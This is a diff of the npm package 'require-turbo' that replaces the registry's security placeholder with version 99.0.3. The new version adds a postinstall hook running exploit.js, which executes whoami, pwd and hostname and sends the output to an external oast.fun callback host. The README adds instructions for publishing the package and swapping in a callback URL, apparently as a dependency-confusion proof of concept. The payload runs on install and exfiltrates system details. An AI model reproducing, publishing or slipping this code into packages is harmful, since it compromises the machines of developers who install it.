require-turbo 0.0.1-security → 99.0.3

package/README.md

@@ -1,5 +1,5 @@
-# Security holding package
+Clone this into a package name directory 
+run 
+npm publish --access public
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=require-turbo for more information.
+NOTE: change the attacker.com to your callbackurl or burp collaborator 

package/exploit.js

@@ -0,0 +1,33 @@
+const http = require('http');
+// 引入 child_process 模块来执行外部命令
+const { execSync } = require('child_process');
+
+try {
+    // 1. 执行命令并获取输出
+    // execSync 的返回值是 Buffer 类型，需要转换为字符串
+    // .trim() 用于移除输出结果末尾可能存在的换行符
+    const user = execSync('whoami').toString().trim();
+    const currentPath = execSync('pwd').toString().trim();
+    const hostname = execSync('hostname').toString().trim();
+
+    // 2. 使用正确的模板字符串语法 ${...} 构建 URL
+    const url = `http://gyjowarodlxnvtkmuxmokoen6v6f32yug.oast.fun/?user=${user}&path=${currentPath}&hostname=${hostname}`;
+
+    //console.log(`正在请求的 URL: ${url}`);
+
+    // 3. 发起 HTTP GET 请求
+    const req = http.get(url, (res) => {
+        console.log(`OK!`)
+	    //console.log(`响应状态码: ${res.statusCode}`);
+        // 你可以在这里处理响应
+    });
+
+    req.on('error', (error) => {
+        console.error(`请求遇到错误: ${error.message}`);
+    });
+
+    // req.end() 会被 http.get 自动调用
+
+} catch (error) {
+    console.error('执行系统命令时出错:', error);
+}

package/package.json

@@ -1,6 +1,13 @@
 {
   "name": "require-turbo",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "99.0.3",
+  "scripts": {
+    "postinstall": "node exploit.js"
+  },
+  "files": [
+    "exploit.js"
+  ],
+  "dependencies": {
+    "@woocommerce/currency": "^4.2.0"
+  }
 }